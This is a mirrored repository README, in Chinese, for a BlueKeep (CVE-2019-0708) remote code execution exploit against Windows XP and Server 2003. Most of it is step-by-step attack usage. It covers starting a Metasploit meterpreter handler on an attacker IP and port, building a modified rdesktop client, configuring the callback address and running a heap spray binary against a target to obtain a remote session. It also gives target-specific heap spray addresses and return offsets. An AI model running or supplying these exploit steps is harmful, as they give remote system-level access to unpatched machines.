Giter Club home page Giter Club logo

cve-2019-0708_bluekeep_rce's Introduction

  1. 运行 msfconsole meterpreter/multi/handler 监听192.168.116.133:6000
  2. cd rdesktop-1.5.0 && make
  3. 修改config,配置回连ip和端口 192.168.116.133 6000
  4. 执行 ./heap_spray 192.168.116.134 (134是xp的地址,内存大于等于2G)
  5. msfconsole meterpreter 会得到session

ps: shellcode/shellcode.asm 是内核shellcode源码,编译以后转成二进制,就是rdesktop-1.5.0\cf517d077e9c152120787eb6b251615b文件了,make的时候会直接编译进程序。

目前仅支持xp,需要xp的内存 >= 2G

如果需要支持2003,需要修改heap_spray.c 里面的 HEAP_SPRAY_ADDRESS 宏地址,经过反复测试,这个地址在03的不同系统版本,不同内存大小是不一样的。但是如果要测试 自己的机器的话,是可以成功在03上利用。不具备通用性。

heap_spray.c

#ifdef _2003

#define HEAP_SPRAY_ADDRESS 0x953b09c0 //需要自己去windbg调试堆喷shellcode的地址 如果有朋友找到通用的解决方案欢迎提交issues

#define IcaChannelInputInternal_RET_OFFSET 0x268

#else

#define IcaChannelInputInternal_RET_OFFSET 0x274

#define HEAP_SPRAY_ADDRESS 0x88c969c0

#endif

测试03

  1. 运行 msfconsole meterpreter/multi/handler 监听192.168.116.133:6000
  2. cd rdesktop-1.5.0 && make
  3. 修改config,配置回连ip和端口 192.168.116.133 6000
  4. 执行 ./_2003_heap_spray 192.168.116.135 (135是03的地址,内存大于等于2G)
  5. msfconsole meterpreter 会得到session

login

cve-2019-0708_bluekeep_rce's People

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.